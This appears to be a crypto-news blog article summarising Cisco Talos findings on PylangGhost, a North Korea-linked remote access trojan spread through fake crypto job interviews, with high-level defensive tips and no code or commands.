North Korean hackers are targeting crypto industry professionals with a dangerous new info-stealing malware, according to cybersecurity firm Cisco Talos. The campaign uses fake job listings and malicious tests to steal sensitive data from blockchain developers and wallet users.
The malware — called PylangGhost — is a Python-based remote access trojan (RAT) that gives attackers full control of infected systems.
🔍 What Is PylangGhost?
Cisco Talos has attributed the malware to “Famous Chollima,” a hacking group aligned with North Korea, also known as Wagemole. The malware is a variant of the earlier GolangGhost RAT, and can:
-
Steal cookies and credentials from over 80 browser extensions
-
Target crypto wallets like MetaMask, Phantom, TronLink, and MultiverseX
-
Steal data from password managers like 1Password, NordPass, and Bitski
-
Capture screenshots, collect system info, and maintain remote access
📌 Victims are primarily located in India, with a focus on people with crypto and blockchain experience.
🎯 How the Malware Spreads
The attack begins with fake job listings posing as roles from major companies like Coinbase, Robinhood, or Uniswap. The process follows these steps:
-
Fake Recruiters: Contact job seekers via email or LinkedIn.
-
Impersonated Websites: Victims are directed to job test platforms mimicking real crypto firms.
-
Social Engineering: During a fake video interview, victims are tricked into running malicious commands under the guise of “updating drivers.”
-
Payload Execution: Once launched, PylangGhost compromises the device and exfiltrates credentials.
🖼️ Fake websites and download instructions are eerily professional-looking.
(Source: Cisco Talos)
🧠 Not AI-Generated
Cisco Talos noted the malware was likely not written with AI tools, as the comments and code structure suggest manual creation by experienced developers — reinforcing the targeted and persistent nature of this campaign.
🚨 Fake Job Scams: A Growing Threat
This isn’t new. In April 2025, North Korean hackers were linked to a similar malware-laced recruitment campaign connected to the $1.4 billion Bybit exploit.
Crypto professionals should:
-
Avoid downloading files or running commands during interviews
-
Verify recruiters and job sites before sharing sensitive information
-
Use security tools to monitor browser extensions and wallet behavior
🔐 Stay Safe in Web3
As North Korean cyberattacks grow more sophisticated, the crypto industry must stay alert. From malicious Chrome extensions to compromised job offers, these actors are leveraging social engineering and custom RATs to steal user funds and corporate data.
For more crypto security updates and scam alerts, visit https://cryptodicenews.blog
